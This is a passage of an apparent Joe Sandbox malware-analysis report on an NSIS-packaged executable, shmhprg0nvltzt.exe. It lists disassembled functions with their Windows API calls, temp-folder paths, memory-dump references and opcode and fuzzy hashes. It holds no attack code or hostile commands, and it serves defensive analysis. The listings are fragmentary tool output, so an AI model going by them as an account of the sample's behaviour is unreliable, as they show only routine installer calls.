                                                                                                                                                                                                                                Function 00405F14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 3248276644-4252944483
                                                                                                                                                                                                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405EB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,C:\Users\user\AppData\Local\Temp\nslEFEC.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nslEFEC.tmp, xrefs: 00405EB8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp
                                                                                                                                                                                                                                • API String ID: 3213498283-3338105827
                                                                                                                                                                                                                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 00402695
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp$C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll
                                                                                                                                                                                                                                • API String ID: 1659193697-1814371670
                                                                                                                                                                                                                                • Opcode ID: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce5005d06b1fe62c951d2c108b7deea1323e23eaef29f3c489712312079c6529
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Program Files (x86)\E6l40hhe, xrefs: 00405E58
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
